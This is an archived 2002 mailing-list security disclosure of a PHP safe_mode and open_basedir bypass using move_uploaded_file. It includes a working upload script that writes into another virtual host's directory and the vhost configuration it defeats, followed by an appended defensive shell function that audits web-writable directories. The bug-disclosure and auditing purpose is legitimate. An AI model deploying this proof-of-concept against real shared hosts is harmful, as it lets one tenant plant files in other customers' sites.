Hey

It's possible to circumvent (probably spelled wrong) PHP safe_mode restrictions by using move_uploaded_file. You take this nasty script (and you have domain whatever.com and your directory path is /domains/whatever.com/ )

    <?
    // Fields of the uploaded file as PHP 4 exposes them
    $file = $HTTP_POST_FILES['file']['name'];
    $type = $HTTP_POST_FILES['file']['type'];
    $size = $HTTP_POST_FILES['file']['size'];
    $temp = $HTTP_POST_FILES['file']['tmp_name'];
    $size_limit = "100000"; // set size limit in bytes
    if ($file){
        if ($size < $size_limit){
            // Destination lies outside this virtual host's open_basedir
            move_uploaded_file($temp, "/domains/somebodyelse.org/public_html/www/test/".$file);
            echo "The file <tt>$file</tt> was successfully uploaded";
        } else {
            echo "Sorry, your file exceeds the size limit of $size_limit bytes";
        }
    }
    echo "
    <form enctype='multipart/form-data' action=$PHP_SELF method=post>
    Upload a file: <input name='file' type='file'>
    <input type='submit' value='Upload'>
    </form>
    ";
    ?>

As you can see, he moved the uploaded file to: "/domains/somebodyelse.org/public_html/www/test/" while the user is restricted with both safe_mode and open_basedir.

Virtualhost configuration snippet:

    <VirtualHost IP_HERE>
        DocumentRoot /domains/whatever.com/public_html/root/
        ServerName root.whatever.com
        CustomLog /domains/whatever.com/logs/access_log combined
        ErrorLog /domains/whatever.com/logs/error_log
        php_admin_value safe_mode 1
        php_admin_value open_basedir /domains/whatever.com/public_html/root/
    </VirtualHost>

As you can see I have set both safe_mode and the open_basedir restriction, but this user is able to upload any file where the apache user has write access.

PHP.net is notified, and the bug has been fixed in CVS. However, I am unable to compile the CVS version atm. Gives a lot of 'make' errors.

Thanks go out to bastijs for pointing this out to me.

Bye,
Tozz
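Since the post notes that an upload can land anywhere the apache user has write access, the following audit sketch (an added example, not part of the original post) lists directories under the hosting root that the web server account can write to and that lie outside one virtual host's open_basedir. The function name exposed_dirs and the account name "apache" are assumptions; the check reads mode bits only and ignores ACLs and parent-directory search permission.

```sh
#!/bin/sh
# Added example, not from the original post.
# exposed_dirs HOSTING_ROOT OPEN_BASEDIR WEB_USER
# Prints every directory below HOSTING_ROOT that WEB_USER can write to
# (world-writable, owner-writable and owned by WEB_USER, or group-writable
# for one of WEB_USER's groups) and that is NOT inside OPEN_BASEDIR.
# Approximation: mode bits only, no ACLs, no check of parent directories.
exposed_dirs() {
    root=${1%/}
    base=${2%/}
    user=$3

    # Build "-o ( -group GID -perm -0020 )" for each numeric group id.
    group_tests=$(for gid in $(id -G "$user" 2>/dev/null); do
        printf ' -o ( -group %s -perm -0020 )' "$gid"
    done)

    # $group_tests is left unquoted on purpose so it splits into find operands.
    find "$root" -type d \( -perm -0002 \
            -o \( -user "$user" -perm -0200 \) \
            $group_tests \) 2>/dev/null |
    while IFS= read -r dir; do
        case "$dir/" in
            "$base"/*) ;;                  # inside the vhost's own tree
            *) printf '%s\n' "$dir" ;;     # writable, yet outside open_basedir
        esac
    done
}

# Example call using the paths from the post ("apache" is an assumed account name):
#   exposed_dirs /domains /domains/whatever.com/public_html/root/ apache
```

Any path it prints is a place where the script above could drop a file on an unpatched PHP build, so tightening those permissions limits the exposure until the fixed version is installed.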
This archive was generated by hypermail 2b30 : Tue Mar 19 2002 - 19:34:48 PST